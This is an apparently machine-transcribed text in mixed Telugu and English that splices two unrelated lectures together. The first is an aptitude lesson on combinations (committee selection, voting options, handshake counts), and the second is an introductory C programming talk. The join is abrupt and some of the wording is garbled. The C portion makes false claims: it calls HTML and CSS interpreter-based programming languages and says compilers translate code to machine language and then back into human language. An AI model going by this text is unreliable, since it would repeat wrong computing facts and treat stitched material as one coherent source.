ఆల్రైట్ జస్ట్ ఫామ్ చేసి వదిలేస్తాం. ఫర్ ఎగ్జాంపుల్ మీ ముందు ఒక 10 మెంబర్స్ని కూర్చోబెట్టి ఇందులో నుండి మీరు ఒక కమిటీ ఫామ్ చేయాలి. ఆ కమిటీలో 2 మెంబర్స్ ఉంటే చాలు, ఉంటే మీరు ర్యాండమ్గా ఏదో ఒక 2 మెంబర్స్ని మీరు తీసుకుంటారు అంతేనా. ఆ 2 మెంబర్స్ని మళ్ళీ మీరు ఎలా కావాలి రైట్ అండ్ లెఫ్ట్ అని మీరు అరేంజ్ చేయట్లేదు. సో అదే డిఫరెన్స్. వెరస్ ఏబి నేను తీసుకున్నప్పుడు ఐఎమ్ గోయింగ్ టు అరేంజ్మెంట్ అంటే ఏబి బిఏ రెండు కన్సిడర్ చేసుకుంటాను. వెరస్ కాంబినేషన్ తీసుకునేటప్పుడు ఓన్లీ ఏబి. లెట్స్ సే ఇఫ్ ఇట్ ఇస్ సి, ఆల్రైట్ ఇఫ్ ఇట్ ఇస్ సి అంటే ఇప్పుడు ముగ్గురు ఉన్నారు. ఇప్పుడు ముగ్గురులో నేను ముగ్గురిని తీసుకుంటాను అనేటప్పుడు ఎలా ఉంటుంది అనేది కూడా మీరు తెలుసుకోవాలి. సో ఇది మనం చూసినట్లయితే సో ఐఎమ్ గోయింగ్ టు అరేంజ్ దిస్ 3 people. ఓకే, సో ఐఎమ్ గోయింగ్ టు అరేంజ్ దిస్ 3 people అంటే అప్పుడు ఏమవుతుంది, ఫర్ ఎగ్జాంపుల్ సో ఇట్స్ గోయింగ్ టు బి ఏ బిసి, ఇది ఒక అరేంజ్మెంట్, అండ్ దెన్ ఇట్ ఈస్ ఏ సిబి బిసిఏ బిఏసి అండ్ సిఏబి and CBA. Correct. Now these many ways వీళ్ళని మనం అరేంజ్ చేయొచ్చు. లెట్స్ సే ఫర్ ఎగ్జాంపుల్ 3 ఎలిమెంట్స్ ఉన్నాయి A B C అంటే ఇట్స్ గోయింగ్ టు బి ACB BCA BAC CBA and CAB. Correct. Now when it comes to combination I'm going to select this 3 people అంటే it's going to be only one way, A B C, that's it. You're not going to do multiple things here. It's going to be only one way you can select all the 3 people. See మీకు ముగ్గురు ఉన్నారు అండ్ ముగ్గురిని మీరు కన్సిడర్ చేయబోతున్నారు. ఆల్రైట్, హియర్ మీరు కన్ఫ్యూజ్ అవ్వడానికి ఇక్కడ ఏం లేదు. అండర్స్టాండ్ దిస్. నా సో కాంబినేషన్స్లో పర్ముటేషన్స్లో ఇంకొకటి ఎక్కడ మీకు ప్రాబ్లమ్ వస్తుంది. లెట్స్ సే ఇఫ్ వీ హ్యావ్ 3 people అండ్ వీఆర్ గోయింగ్ టు సెలెక్ట్ ఓన్లీ 2 people, ఐ మీన్ అరేంజ్ ఆర్ సెలెక్ట్, అప్పుడు మనం ఏం చేస్తామని చెక్ చేయాలి. నా లెట్స్ సే ఈ పర్టికులర్ కేస్ మీరు చూసినట్లయితే సో వీ హ్యావ్ 3 people. సో ఈ 3 peopleలో so in how many ways I can arrange 2 different people అంటే try to understand. See first thing నేను AB లేదు BA, correct, AB లేదు BA, and let's say నేను CB అని తీసుకుంటే it's going to be CB or BC, లేదు నేను AC తీసుకుంటే AC or CA అని వస్తుంది. Understand this? Here it's going to be AB లేదు BC లేదు CA, that's it. It's so simple. Here we get multiple arrangements and all, but here we got only 3. But I don't bother how A and B are going to sit or arranged. So it's like I'm going to choose AB ledante BC ledante CA. This is just a selection, this is arrangement. Fantastic. Now if you see this question, now you will understand. Just have a look at the screen. Okay, in how many ways a committee of 6 members, fantastic, so it's going to be 6 members can be formed out of how many men, 7 men, and how many ladies, 6 ladies. 6 members I'm going to form consisting of 4 men and 2 ladies. Fantastic. 4 men and 2 ladies. Alright, this is the concept. Observe this. So we have 7 men, 7 male and 6 females, 7 men or 6 ladies, however the way you want. And out of this, so ఎంతమంది ఉన్నారు మీరు చూసినట్లయితే we have totally 13 people, correct? 7 plus 6 it is 13. ఆ 13 లో 7 male and 6 female. ఈ particular 7 male and 6 female లో you people are going to form a committee which has how many members? 6 members. And a 6 members లో now we have a condition. Last time మీరు చేసిన క్వశ్చన్ మనం సాల్వ్ చేసిన క్వశ్చన్ ఎలా ఉండే అంటే 7 member, I mean so some total count here and here, and they asked us to form a committee which has this many members. అంటే for example 7 members 6 ladies ఉన్నారు, దీంట్లో నేను 6 members ఉన్న ఒక కమిటీని ఫామ్ చేయాలంటే I'll be saying 13 C 6, so 7 male 6 female, which means totally 13 members. ఈ 13 members లో I'm going to form a committee which has 6 members. 13 say 6 అనే ఆన్సర్ నేను చెప్పేసి వెళ్ళిపోతాను. బట్ try to understand, here we have a condition. What is that condition? మీరు ఫామ్ చేసే 6 మెంబర్స్లో అంటే 6 మెంబర్ కమిటీలో 4 మెంబర్స్ ఖచ్చితంగా మేల్ ఉండాలి అండ్ 2 మెంబర్స్ ఎవరు ఉండాలి, ఖచ్చితంగా లేడీస్ ఉండాలి. Alright, so we have a condition. This we need to understand. Now you cannot use 13 6 bluntly.
directly. So we have to do some manipulation. So what is the kind of manipulation? We are going to form a 6-member team, correct? Now let's see the 6 నేను ఎలా స్ప్లిట్ చేసుకుంటాను అనేది మీరు ఒకసారి చెక్ చేయండి. Now a 6-member team, 6 members committee, correct? The 6 members ని ఎలా చేసుకుంటాను. So how many people have to be there? ఆ టీంలో ఎలా ఈ 6 members ఎలా ఉండాలంటే డెఫినెట్గా 4 men ఉండాలి, కరెక్టా? సో 4 men. సో ఈ 4 men అనేది టోటల్ కౌంట్ ఎంతమంది మేల్స్ ఉన్నారు అంటే 7 మేల్స్ ఉన్నారు. సో ఈ 7 మేల్స్లో నేను 4 మేల్స్ని సెలెక్ట్ చేసుకుంటున్నాను. ట్రై టు అండర్స్టాండ్. ఈ 7 మేల్స్లో నేను 4 మేల్స్ని తీసుకుంటున్నాను ప్లస్ alright now and so it's obviously into and then what is a female? So we have totally 7 men and how many females are there? Ladies are here. It is going to be 6 females, correct? 6 females. So ఈ 7 members లో 4 members ని తీసుకుంటున్నాను and then ఈ 6 members లో 2 members ని తీసుకుంటున్నాను. That's it. This is going to be the answer. 7C4 into 6C2. I repeat this. 7 men, you have 7 men and 6 females with you, whereas you have to form a 6-member committee and ఈ 6 members లో try to understand ఈ 6 members లో definite గా 4 males ఉండాలి, 2 females ఉండాలి. సో 4 males ఉండాలి కాబట్టి ఈ మేల్స్ టోటల్ ఎంతమంది ఉన్నారు? 7 members ఉన్నారు. సో 7C4 into and it is going to be and. Remember, so and in permutation combination is always, you have to use a multiplication symbol, and wherever you get or, it's obviously addition symbol. So you have to follow the same rule here. Now in such case, so 7C4 and finally it is going to be 2 females undali ఈ 6 members లో. ఆ 2 females ఎవరు అంటే 6 females లో ఉన్న ఎవరన్నా ఇద్దరు. So it's going to be 6C2. Now if you solve, it's going to be 7 factorial by 7 minus 4 factorial into 4 factorial. అవునా? Into it is going to be 6 factorial by 6 minus 2 factorial into 2 factorial. Hence it is 7 factorial by 3 factorial into 4 factorial into 6 factorial by, so it is going to be 4 factorial into 2 factorial. Now if you simplify, this can be written as 7 into ఈ పర్టికులర్ పార్ట్ మీరు చూసినట్లయితే 7 into 6 into 5 into 4 factorial రాసుకోవచ్చు. 7 descending order multiplication. So 7 into 6 into 5 into 4 by this can be written as 3 factorial into 4 factorial. Now I'm going to cancel this 4 factorial and we are left with 7 into 6 into 5 by 3 factorial in raskochu 3 into 2 into 1. And guys, we know that this is 3 2s 6 and 7 5s 35. So this is nothing but 35 into. Now let's see what are the, let's solve this, which is nothing but 6 can be written as 6 into 5 into, and what is this? 4 factorial by 4 factorial into 2 factorial. Now 4 factorial gets cancelled, and 2 factorial is nothing but 2 1s and 2 3s, which is 5. We are left with 3 into 5, which is 15. Fantastic. Now this is 15. So the final answer is going to be 35 into 15. So 5 5s 25. So 5 5s 25, 5 3s 15, 17, and this is obviously 35, and so 5, and it's going to be 12, and it is 5. So 525 base. 525 base. That's it. So if you get the answer this way, it is so simple, which is 7C4 into 6C2. Ila answers undali and chepi. In fact, I always wish, but it depends. Ila answers ila short form lo ravachu, but 90% it is going to be as a number. So 7C4 into 6C2 to answers ni stop cheyadandi. Please try to multiply and try to get the answer. Start practicing it. Alright, so you cannot expect that I'm going to stop here and I'll get the same thing as an option in my examination. No, never. Alright, let's see the next question. Okay, in a committee, in how many ways can a committee of 4 men and 3 women can be appointed from 6 men and 8 women? So simple. Now see this question, I think we have already done this question. Let's this type of question we have already done. Let's go to the next question. This is very important. And now see this question. At an election
how many candidates? I mean, it's going to be 5 people, correct? Yes. So at an election, there are 5 candidates. 3 members are to be elected, and a voter is entitled to vote for any member to be elected. How many ways a voter can vote? Okay. And there is a hint for this question as well. Voter has an option to vote for at least 1 candidate or at most 3 candidates. Fantastic. Now, in how many ways can a voter can vote? All right. So this is something, you know, it's like what I can say. It's like somewhat tricky question which you have to understand. So how many people are there? If you ask me, totally 5 people. All right. Let's say I'm going to name them as A, B, C, D, E. There are 5 people. These are the names. Okay, A, B, C, D, E. And how many people? 3 members are to be elected. So out of this A, B, C, D, E, we are going to elect only 3 people. In such case, in how many ways a voter can vote? This is something tricky. This is not as easy as the previous question what I've seen. Now, how to do this? This is very simple. I mean, simple in the sense if you understand I'm talking about. A, B, C, D, E. దీని తెలుగులో నేను చెప్తే 5 మంది ఉన్నారు, టోటల్గా 5 మెంబర్స్ ఉన్నారు. ఈ 5 మెంబర్స్లో నేను ముగ్గురిని మాత్రమే సెలెక్ట్ చేసుకోగలుగుతాను. ఈ ముగ్గురిని మాత్రం నేను ఓట్ చేయగలుగుతాను. ఇన్ఫ్యాక్ట్ సెలెక్ట్ చూసింగ్ ఇన్ ద సెన్స్ హియర్ ఇట్స్ గోయింగ్ టు బి ఓటింగ్. సో ఇది ముగ్గురికి నేను చూస్ చేసుకోగలుగుతాను. నా ఇన్ హౌ మెనీ వేస్ వీ కెన్ డూ ఇట్? ఐ మీన్ ఓటర్ కెన్ ఓట్ ఇట్ అంటున్నారు. బట్ ట్రై టు అండర్స్టాండ్ ఓటర్ ఎంతమందిని చూస్ చేసుకోవచ్చు. ఫర్ ఎగ్జాంపుల్ నేను ఓటింగ్కి వెళ్తే నేను ముగ్గురిని చూస్ చేసుకోవచ్చా, ఒకరిని చూస్ చేసుకోవచ్చా, ఇద్దరిని చూస్ చేసుకోవచ్చా అంటే ఇట్ ఇస్ సో సింపుల్. ఓటర్ మినిమం ఒకరిని చూస్ చేసుకోవచ్చు, మ్యాక్సిమం ముగ్గురిని చూస్ చేసుకోవచ్చు. ఆల్రైట్, మ్యాక్సిమం. సో ఇఫ్ యూ కెన్ సీ, ఇఫ్ యూ అబ్జర్వ్ ద స్క్రీన్, ఓటర్ హ్యాస్ ద ఆప్షన్ to vote for at least 1, correct? To vote for at least 1 and at most 3 candidates. So you have 3 different conditions here. ఈ 3 different conditions ని మీరు కన్సిడర్ చేసుకుంటే మాత్రమే ఇది మీకు వస్తుంది. లెట్స్ సే ఫర్ ఎగ్జాంపుల్ ఫస్ట్ కండిషన్ ఏంటి అంటే నేనే కాసేపు ఓటర్ అని తీసుకుంటే, సో నేను ఆ పోలింగ్ బూత్కి వెళ్ళి సో 5 candidates ఉన్నారు, కరెక్ట్? నా లెట్స్ సే ఇఫ్ ఐమ్ గోయింగ్ టు ఓట్ అని తీసుకుంటే, సో నా ఆప్షన్స్ ఏంటి? నేను ముగ్గురిని సెలెక్ట్ చేసుకోవచ్చు కదా, ముగ్గురినే ఖచ్చితంగా సెలెక్ట్ చేసుకోవాలని లేదు. నేను ఒకరిని సెలెక్ట్ చేసుకుంటే పాసిబిలిటీస్ ఏంటి? లెట్స్ సే ఐమ్ గోయింగ్ టు చూస్ ఓన్లీ 1 person. అంటే ఈ 5 మెంబర్స్లో నేను ఒక్కరికి మాత్రమే ఓట్ చేశాను అంటే విచ్ మీన్స్ ఇట్స్ గోయింగ్ టు బి 5C1. సో వీ ఆల్ నో దాట్ 5 మెంబర్స్లో నేను ఒకరిని మాత్రమే సెలెక్ట్ చేసుకున్నాను, ఇట్ ఇస్ 5C1. అండ్ 5C1 వీ ఆల్రెడీ నో దట్ ఇట్ ఇస్ 5 different ways, కరెక్ట్? 5 different waysలో నేను చూస్ చేసుకోవచ్చు. ఇన్ ద సెన్స్ దిస్ ఇస్ ఓన్లీ 1 person. నౌ లెట్స్ సే నేను ఇద్దరికి ఓట్ చేసిన అంటే నేను ఇద్దరిని చూస్ చేసుకుంటున్నానంటే ఐ కెన్ ఓట్, ఐ మీన్ నేను ఇద్దరికి ఓట్ చేసిన ఈ 5 మెంబర్స్లో నేను ఇద్దరిని సెలెక్ట్ చేసి వాళ్ళకి ఓటింగ్ వేసిన అంటే 5C2. సో విచ్ ఇస్ నథింగ్ బట్ మనం ఆల్రెడీ చూసాం. సో ఇట్స్ లైక్ 5 factorial by 5 minus 2 factorial into 2 factorial, which is nothing but 10 different ways. 10 different ways. And try to understand ఈ కండిషన్ ఎప్పుడు అంటే నేను ఇద్దరికి ఓట్ వేసినప్పుడు, ఓటింగ్ చేసినప్పుడు. నా మ్యాక్సిమం నేను ఇంకా ఎంతమంది చూస్ చేసుకోవచ్చు అంటే నాకున్న ఫైనల్ ఆప్షన్ నేను ముగ్గురికి ఓటింగ్ చేయొచ్చు, విచ్ ఇస్ నథింగ్ బట్ 5C3, విచ్ మీన్స్ 5 factorial by 5 minus 3 factorial into 2 factorial, correct? Which means this is also 10 different ways. అంటే సో ఇది ఆల్రెడీ మనం సాల్వ్ చేసాం. దిస్ ఇస్ ఆల్సో ఇట్స్ ఓన్లీ 10 different ways, which means I'm going to select 3 people. ఓకే, సో నేను ఒకరి మాత్రమే చూస్ చేసుకుంటే నేను 5 different ways చూస్ చేసుకోవచ్చు, ఎందుకంటే 5 members ఉన్నారు. నేను ఇద్దరిని చూస్ చేసుకుంటే ఐ హ్యావ్ 10 different combinations, అంటే 10 different waysలో నేను సెలెక్ట్ చేసుకోవచ్చు. నేను ముగ్గురికి ఓట్ చేయాలి అనుకుంటే 10 different waysలో చేసుకోవచ్చు. సో టోటల్గా నాకు ఎన్ని ఆప్షన్స్ వస్తుంది అంటే 5 plus 10 plus 10. సో ఇట్ ఈస్ గోయింగ్ టు బి 25 ways. 25 different waysలో నేను ఓట్ చేసేసి రావచ్చు. ఓటింగ్ అంటే సెలెక్ట్ చేసుకొని రావచ్చు. ఒకరినే సెలెక్ట్ చేసుకుంటే నాకు 5 ways కనబడుతుంది, ఇద్దరిని సెలెక్ట్ చేసుకుంటే 10 ways, ముగ్గురిని సెలెక్ట్ చేసుకుంటే 10 ways. టోటల్గా నాకు ఛాన్సెస్ ఎన్ని ఉంటుందంటే 25 different waysలో నేను ఓటింగ్ చేసి రావచ్చు. ఇఫ్ ఐ కన్సిడర్ మై సెల్ఫ్ యాజ్ అ ఓటర్. ఆల్రైట్, లెట్స్ సీ ద ఇంట్రెస్టింగ్ క్వశ్చన్ నా. దీస్ ఆర్ సో ఇంపార్టెంట్. ఆల్రైట్, ఇలాంటి క్వశ్చన్స్ మీరు ఎగ్జామ్స్లో ఇలాంటి క్వశ్చన్స్ మీరు ఫేస్ చేసి ఉంటారు. లెట్స్ సే సపోజ్ దెర్ ఆర్ 42 men and 16 women in a party. Try to understand. Suppose there are 42 men and 16 women in a party. Each man shakes his hand only with all the men. Alright, so each man shakes his hand only with all the men and each woman shakes her hand only with all the women. So
we have to find the maximum number of handshakes that have taken place at the party. Fantastic. So ఇలాంటి క్వశ్చన్స్ మీరు చూడండి, నార్మల్గా ఈ కమిటీ ఫార్మేషన్ అంతా మీకు ఆల్రెడీ చూసాం కాబట్టి ఇట్స్ గోయింగ్ టు బి సింపుల్ అండ్ ఈజీ. బట్ ఇలాంటి క్వశ్చన్స్ సొల్యూషన్ పార్ట్ మీరు చూసినట్లయితే వీ డోంట్ హ్యావ్ మచ్, బట్ వెన్ ఇట్ కమ్స్ టు అండర్స్టాండింగ్ ద క్వశ్చన్, ఎస్ ఆఫ్ కోర్స్ ఇట్ ఇస్ డిఫికల్ట్. ఓకే, నా సో టోటల్గా ఎంతమంది ఉన్నారు? ఇట్స్ గోయింగ్ టు బి 58 people. It's 58 people, 42 members దాంట్లో మేల్ అండ్ 16 people ఫీమేల్. సో మేల్స్ చూసినట్లయితే ఫర్ ఎగ్జాంపుల్ హ్యాండ్ షేక్స్ జరుగుతున్నాయి ఆ పార్టీలో. ఆల్రైట్, ఆ హ్యాండ్ షేక్స్ అంటే మేల్, లెట్స్ సే ఫర్ ఎగ్జాంపుల్ వన్ మేల్ పర్సన్ గోయింగ్ టు షేక్ హిస్ హ్యాండ్ ఓన్లీ విత్ అనదర్ మేల్ క్యాండిడేట్. ఆల్రైట్, అండ్ లెట్స్ సే వన్ లేడీ, షీ ఈస్ గోయింగ్ టు షేక్ హర్ హ్యాండ్ ఓన్లీ విత్ ద అనదర్ లేడీ. ఇన్ సచ్ కేస్ టోటల్గా పార్టీ మొత్తంలో ఎన్ని హ్యాండ్ షేక్స్ ఉంటాయి అనేది మనం ఫైండ్ అవుట్ చేయాలి. ఓకే, ఇన్ సచ్ కేస్ see this questions and all, it is like the solution part, if you ask me, it is not that difficult. You can get the answer within 30 seconds, as I discuss always. But the problem is have to hit the question, how to understand, how to analyze, and how to hit the solution. That's going to be the challenge. So let's see. So 42 people and 42 men and 16 women. Correct. Now, so try to understand, if it's a handshake, it happens between two people. Avuna, handshake and definitely it happens between two people. A single person cannot give the handshake, so it's not possible. So it's minimum two people and not three. Three people cannot shake the hand at the same time. In such case, so if it's going to be handshake, 42 people, let's understand how many handshakes are going to happen between this 42 men. So it is going to be 42C2. సో ఈ 2 అంటే ఇద్దరు, ప్రతిసారి ప్రతి హ్యాండ్ షేక్లో ఇద్దరు ఉంటారు. ఇన్ సచ్ కేస్ 42C2, కరెక్ట్. నౌ ఇట్స్ గోయింగ్ టు బి excuse me, now it is going to be 42 factorial by, and it is 40 factorial into 2 factorial, which means 42 into 41 into 40 by 40 factorial by 40 factorial into 2 factorial. So 40 gets cancelled, and this is 42 into 41 by 2, which means 2 ones to 21. So 21 into 41, so which is 1 2 4 ones 4 4 twos 8, so 861. Alright, if you ask me how many handshakes, how many handshakes that have taken place when in between men is going to be 861. So simple. This calculation is nothing but 42C2. Alright, 861. Let's understand how many handshakes that takes place between the women. It is going to be once again 16C2. Two people are going to involve in one handshake. Now in such case it is 16 factorial by 16 minus 2 factorial into 2 factorial. Correct. Now it is 16 factorial by it's 14 factorial into 2 factorial. Now this is 16 into 15 into 14 factorial by 14 factorial into 2 factorial. So 14 gets cancelled. 2 factorial is nothing but 2. So 2 ones to 8. So 15 into 8 it is. So 15 8 it is 120. Okay. Try to understand. 861 handshakes are going to take place within this 42 men, and 120 handshakes are going to take place between this 16 women. Correct? Kani man total party lo enni ani adugutunnaru kabatti it's going to be 861 plus 120. So obviously it is 1, and this is 8, and this is 9. 981 handshakes. 981 handshakes. This is how you solve the question. So total number of handshakes that take place in this party is nothing but 981 handshakes. So I hope you understand this permutation and combination, and exclusively this class, combinations class. If you have any questions, please post it in the comment section. And if you ask me, are these questions going to be enough? No, it's like one stage where I have given you all the different types of questions, so you have to take the have to practice a lot. So ilanti questions me chusinattaithe repeated ga idi kuda nenu oka TCS Infosys question paper nunchi teeskoni solve chesina question maatrame, previous ga adina questions. So ilanti questions meeru practice cheyga first thing remember,
we have to understand whether that particular questions comes under principles of counting or whether it is permutation or it is combination. Majority of the students, they face the same scenario. Whenever they get into the examination, they could not identify what should I do with the question. A question చూడగానే I know, I mean students mentality ఇప్పుడు చూసినట్లయితే question చూడగానే this question belongs to permutation combination అని చెప్తున్నారు. But if I ask them how to solve this, no, they are keeping quiet. Now I request them, try to understand the differences before you solve the question. ఇదేంటి permutation అంటే ఏంటి నేను మీకు క్లియర్గా చెప్పాను. ఇట్ ఈస్ నథింగ్ బట్ ద అరేంజ్మెంట్, how many ways you're going to arrange it, and second, it is going to be selection, in how many ways you're going to select it, and principles of counting, it is not required at all. So just common sense is required. So whenever you see the question, try to segregate at which part it belongs to. అది మీరు చేసినట్లయితే and it is going to be easy. And remember, calculation solution part, it is going to be simple, but in order to understand and analyze the question, that's going to take time. So I hope you understand this class. Please, comments, I'm not getting any comments, or requests regarding any questions. Please do let me know if you have any doubts so that I can answer. Thank you so much. Welcome to the viewers. This is Suryanarayan Raju. Before going to start a C language program, now you have to know about some basics C language programming. Actually, C is a programming language. What is mean by program? What is mean by language? What is mean by software? The basics to be understand before going to start the C programming language. Now in the market, everywhere programming languages are there. C language, C++, Java, .NET, COBOL, Pascal. Now before going to start a C programming language, you have to know basics about software. What is mean by software? A set of programs called as software. What is mean by program? Program is nothing but set of instructions or a set of statements is called as program. Now see, now in the market two types of softwares are there: system softwares, application softwares. What is mean by system software? Which software understandable by the machine instructions, that software called as system software. What is mean by application software? Which software understandable by the user instructions, that software is called as application software. Now for the system software, operating systems. Now in the market many operating systems are there: DOS, Windows, Unix, Linux, Mac. These are called as system softwares. What is mean by application software? Which software understandable by the user instructions, that software is called as application software. Now in the market different types of application softwares. Like in the daily life you are using different type of applications like Google, Gmail, Facebook. Desktop applications also there like Notepad, MS Word, Paintbrush Picture. Now these all softwares are developed based on programming languages. These all softwares are developed based on programming languages. C is a programming language. Generally, what is meant by language? Language is nothing but it's a communication. Communication between the people is called as language. But in the programming, language is nothing but communication between user and the machine instructions. The system does not understand the user language. System followed by binary instructions. If you want to communicate the binary instructions, you require some language. That language is called as programming language. What is the definition of programming language?
It is one of the language to communicate machine language and user language. Now here different type of programming languages are there like C, C++, Java, .NET, COBOL, Pascal. Totally in the market 125 plus programming languages you have. But these all languages, which is the basic programming language, C is a basic programming language. C is a basic program to be understand. Now see, before going to start C language, I have to define some definitions. You see the definitions now. What is mean by software? What is the meaning of software now? It is a collection of programs. Software is nothing but it's a collection of programs. What are the software types you have? Software types. What are the types of softwares you have? First category of software, system software. What is meant by system software? Which is software understandable by the machine instructions. The machine does not understand your language, that's why it is called as system software. Which is software understandable by the machine instructions? That software is called as system software. Now you see which are the system softwares are there. Now in the market, which are the system software? Example, you have operating system. Operating system is one of the system software. Suppose if you want to install any softwares, which is the basic software to be installed? OS to be installed. If you purchase any laptop or if you purchase any desktop, which is the basic software to download first? Operating system. Operating system is a which category of software? System software. Now which are the types of operating systems in the market? MS-DOS, Microsoft Disk Operating System, MS Windows. Windows is also operating system from the Microsoft. Unix operating system. And what is one more type of operating system? Linux, Mac. Many operating systems are there in the market. DOS, Windows, Unix, Linux, Mac. But mostly number of programmers or number of users mostly used which operating system? Windows operating system. Mostly used Windows. Now the Windows operating system developed by which company? Microsoft. What is one more category of software you have? Application software. One more category of software called as application software. Which is software understandable? Which is software understandable by the user instructions? By the user instructions. That software is called as application software. That software is called as application software. What is the meaning of application softwares? Which are understandable by the user instructions, like English language, our understandable. Daily life, you are using different type of applications. Like if I open any machine, either laptop or desktop, you are opening with different type of apps. Notepad. Notepad is a which type of application? Desktop application. What is meant by desktop application? Which application can be run only on single machine? That application called as desktop application or standalone application. Which application can be executable only single machine? That application called as standalone or desktop application. Like if you are using with the Paint, that is also which category of application? Desktop application. MS Word, MS Excel. If you are using with the Gmail, Gmail is a which type of application? Web application. It is web app, web application. Every web application executed with multiple machines.
If you want to open the Gmail application, compulsory which is required? Browser required. Through the browser only to open the application, that application called as web applications. Like which are the browsers are there? Google Chrome, Mozilla, Internet Explorer. If you want to open any web application, through browser only to open that application. Gmail, Facebook. What is one more category of application you have? Mobile based application. Mobile apps also use. Mobile applications like WhatsApp. WhatsApp is also one application. Through the mobiles, smartphones or tabs to be run. Finally, what is my conclusion? In the market, all softwares are developed different type of programming languages. All types of softwares developed based on different type of programming languages. In that programming languages, C is the basic programming language. Now see, what is mean by system software? Actually, I discussed it's a machine understandable softwares. System softwares developed based on which programming language? System softwares are developed basically C, C++ programming languages. C, C++ programming languages, system softwares are developed. If you want to develop with application softwares, which are the programming languages in the market now? Application softwares how to develop based on which programming languages? .NET or Java. Java is a programming language. .NET also programming language. Finally, what is my conclusion now? Every system softwares are developed based on C language or C++. Every application softwares are developed based on advanced programming language. Now in the market, which are the advanced programming languages? Java programming language, .NET programming language. But actually, if you want to learn the Java programming language or if you want to learn the .NET programming language, must and should, which is the basic programming to be learned? C language. C is a basic language for all programming languages in the market. Now listen, before going to start the C programming language, now in the market, which are the programming languages available before C language? Before C programming language, which are the different type of programming languages available in the market? Now that you have to discuss now, generations of programming languages. Generations of programming languages you have. You see that already what is meant by program? Program is nothing but a set of instructions or a set of statements is called as program. What is meant by language? It's a communication between the user and the machine with the help of programming languages. Now before C language, I want to discuss some generations of programmings are there. Now what is the first type of generation of programming language you have? Machine programming or machine level programming. Under generation of programming languages, which is the first generation programming language? Machine language. What is meant by machine language? Which language complete program you have to write into machine codes? What is the meaning of machine language? The program completely you have to write into binary instructions. What are the binary instructions? Zeros and ones. If I want to work with machine language, compulsory which to be understand? Binary numbers. What is meant by machine level programming languages? These programming languages, these programming to write machine codes, completely machine codes like 0, 1. Now this programming language is completely machine understandable language. It is not a user understand, it's completely machine understandable language. It's completely machine understandable language.
not for user understandable. And what is one more type of programming language you have? One more generation of programming you have, mid-level programming language. What is meant by mid-level programming language? Now in this programming language you can write the machine codes plus English language also, machine plus English. Now this is also called as assembly language programming. It's called as assembly language programming. Like see, if you go for machine language program, if you work with machine language program, I want to add the two numbers 10 plus 5. I want to add the two numbers 10 plus 5. Actually 10 is our understandable number, 5 is our understandable number. But when you go for machine language, the 10 first to convert to the binary, then only you can run the program, you can write the program. What is the 10 binary number? 1010. After that 5 also binary number you have to write, 5 also binary number 101. That means what? If I want to work with machine language, compulsory your instruction should be maintained to the ones and zeros. If you know the ones and zeros, then only you can run, otherwise you can't run off these. It's very difficult to understand. It's completely machine understand. There is no English here. What is meant by mid-level? It's a assembly language. What is meant by assembly language? It's a mixed code of assembly language called as mixed code of machine language plus machine also there plus English. 50% machine code, 50% English code. The both can be right. This is called as assembly language. Compared to machine level, which level is understandable? Mid level. Some more understand. Now this language called as assembly language, it is also machine understandable. It is not complete user understand, it is not complete machine understand. It's a 50-50, 50% machine, 50% user. When you go for mid-level language, assembly language, if I want to add the 10 plus 5, add is a mnemonic word, you have, it's a English. After that 1010, it's a binary number, 101, it's a binary number. What is the meaning of that? Add is English, 1010101, it's a binary. The mixed code of instructions will be typed with the help of mid-level or assembly language. What is the third generation of programming language you have? High-level programming, high level. What is meant by machine level? Completely low level, it's completely low level. What is meant by middle level? It's 50% machine, 50% user. What is meant by high level language? Is completely user understandable language. Which language is completely user understandable language? High level language. Now this language to write the code in English language. Directly you can write the code English language. Now it's a completely high level language. Which are the high level languages in the market? Currently you are learning C language. C is a high level language. C++ also high level language. Java also high level language. .NET also high level programming. Now in the market 125 plus programming languages are there. It's a high level languages. 125 plus programming languages. These all are high level languages. Finally, what is my conclusion? C is a high level programming language. Which are the generations of programming you have? First one is machine level, it's called as low level program. Second one is mid level, it's called as assembly language program. Third level or third generation called as high level program. The complete program you have to write into English. Now this is completely user understandable. This language completely user understandable. User followed that. This language understandable by the user code.
understandable by user code, by the user code that you can understand. Now see, these all generations of programming languages, which language to use the compiler's high level language. Under high level language you have to use one translator, it is called as compiler to be used. Compiler. What is mean by compiler? It is one of the translator. You can convert your program code into machine language, again that is converted into our understandable language. What is the definition of compiler? You write the program in English, but that is converted to the machine language, again that is converted to the our understandable language. This work done by which processor? Compiler. Compiler can be done. These compilers are introduced only high level language. High level languages only introduced to the compiler. Now see, which is mean by translator. Which is mean by translator? You have translator. Compiler is used to convert your complete program into machine language at once, but translator is nothing but you can convert to the machine language line by line or step by step. Line by line or step by step you want to use. Now you see, what is the type of translators you have? You have the compiler also one type of translator, and interpreter also one type of translator. Compiler also one type of translator, interpreter also one type of translator. What is the difference of compiler and interpreter? Compiler, all lines of code at a time convert to the machine language, it is a program wise. But interpreter, it is converted to the machine language step by step. It is completely step by step convert to the machine language, but this is complete all lines at a time convert to the machine language. But anyway, both are called as what? Translators. You want to convert source code into machine code, again that is translated to our target code. This is the work of translators. Now in the market, which are the compiler based languages? C, C++, and COBOL, Pascal, these are the compiler based languages. Many languages you have compiler based. Which are the interpreter based languages? HTML, hypertext markup language, CSS, cascade style sheet, and JavaScript. JavaScript also interpreter based language. Now in the market, some languages are compiler based, some languages are interpreter based. Which are the compiler based languages? C language, C++, COBOL, Pascal, Ada. Which are the interpreter based languages? HTML, CSS, JavaScript. These are the interpreter based languages. Now you see, whenever you are working with a C programming language, you have to idea about some basic definitions, like what is mean by program. Before going to start the C program, what is mean by program? A set of instructions, is called as program. What type of instructions you can run? Input instructions, output instructions. Every program consists with a set of instructions, input instructions, output instructions. What is meant by input instructions? Which instructions are inputting through the input device like keyboard? What is meant by output instruction? After processing, you are inputting some value, after processing you are expected some output, that is called as output instruction. Which is the output instruction to be run? Output device. Input instructions are inputting through the keyboard, output instructions are receiving through the monitor, that is called as output device. Now see, every program set of instructions can be maintained. What is meant by software? Software called as set of programs. See that, what is meant by software? Set of programs called as software, set of programs, that is called as software. Program is nothing but set of instructions. Now finally, in C language, what to be developed? Programs.
